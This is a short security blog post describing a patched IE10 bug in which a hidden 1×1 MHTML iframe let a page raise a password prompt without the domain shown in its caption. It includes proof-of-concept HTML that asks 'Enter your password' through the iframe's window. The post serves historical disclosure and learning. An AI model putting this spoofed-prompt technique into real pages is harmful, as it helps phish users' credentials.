IE10 Prompt Domain Information Bypass via MHTML

IE10 added a security improvement to window.prompt that always shows the calling domain in the dialog’s caption bar — replacing the generic “Explorer User Prompt” text that made phishing easy. I found that calling prompt from inside an MHTML file framed in an iFrame reverted to the old generic caption, bypassing the domain attribution entirely.

<!-- The comparison: -->
<input value="Show domain" type="button"
  onclick="window.prompt('Enter your password', '')"/>

<!-- Bypass: calls prompt through the MHTML iFrame's window object -->
<input value="DO NOT show domain" type="button"
  onclick="window[0].prompt('Enter your password', '')"/>

<iframe src="dummy.mht" width="1" height="1"></iframe>

The MHTML file is tiny and hidden (1×1 pixels). When the prompt is invoked via window[0].prompt() — the window of the MHTML iFrame — it shows “Explorer User Prompt” in the title bar instead of the calling domain, making it indistinguishable from an unattributed system dialog. Tested on IE10 Win8 RTM.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Modern UI Mail Security Issues] :: [MSN Explorer Security Issues] >